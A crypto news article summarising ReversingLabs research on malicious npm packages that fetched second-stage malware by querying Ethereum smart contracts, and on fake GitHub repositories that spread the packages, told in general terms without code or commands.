crypto for all
Join
A
A

Hackers Hide Malware in Ethereum Contracts to Evade Detection

12h05 ▪ 3 min read ▪ by Peter M.
Getting informed Altcoins

Software supply-chain attacks are evolving in a disturbing way as cybercriminals use Ethereum smart contracts to hide malicious code within open-source libraries. Research presented by a security firm ReversingLabs shows that hackers now insert command-and-control instructions within blockchain contracts, complicating detection and closure by defenders. This approach signifies the increased complexity of malware distribution and blockchain becoming a tool of cybercrime.​​

Les yeux brillants d’un pirate informatique à capuche émergent d’un code en cascade tandis qu’un logo Ethereum fissuré rayonne d’une lumière étrange.

In brief

  • Attackers now use Ethereum smart contracts to hide malware in open-source libraries.
  • Malicious npm packages retrieve payloads via blockchain, bypassing traditional defenses.
  • Fake GitHub repositories amplify attacks, rotating dependencies to spread infections widely.

How the Attack Worked

The campaign primarily targeted Node Package Manager (npm), a platform that hosts millions of JavaScript packages. Two suspicious packages, “colortoolsv2” and “mimelib2,” emerged in July and served as carriers of the malicious code. 

Instead of embedding links directly within the package, the malware executed obfuscated scripts that queried Ethereum contracts to retrieve the payload location. Consequently, this method complicated traditional detection systems that usually flag hard-coded malicious domains.

Once the script accessed the smart contract, it directed the infected package to download a secondary malware component. This design allowed attackers to maintain flexibility by changing payload locations on the blockchain, without altering the npm package itself. 

Besides, the campaign used crypto-themed GitHub repositories filled with fake stars and generated commits to appear legitimate, luring unsuspecting developers to integrate the packages.

ETHUSDT chart by TradingView

Larger Campaign Across Open-Source Platforms

ReversingLabs researchers uncovered that the malicious npm packages were part of a broader campaign extending to GitHub projects. Fake repositories such as “solana-trading-bot-v2” attempted to establish credibility through automated commits and staged community activity. Behind the façade, attackers quietly rotated malicious dependencies under different names, spreading the infection across multiple projects.

Your 1st cryptos with Coinbase This link uses an affiliate program.

Moreover, this attack followed earlier incidents flagged by security firms where npm and GitHub were exploited to push fraudulent trading bots and crypto utilities. Hence, the latest campaign marks a concerning evolution, showing that threat actors are not only abusing open-source trust but also integrating blockchain technology into their attack chains.

Maximize your Cointribune experience with our "Read to Earn" program! For every article you read, earn points and access exclusive rewards. Sign up now and start earning benefits.



Join the program
A
A
Peter M. avatar
Peter M.

Peter is a skilled finance and crypto journalist who simplifies complex topics through clear writing, thorough research, and sharp industry insight, delivering reader-friendly content for today’s fast-moving digital world.

DISCLAIMER

The views, thoughts, and opinions expressed in this article belong solely to the author, and should not be taken as investment advice. Do your own research before taking any investment decisions.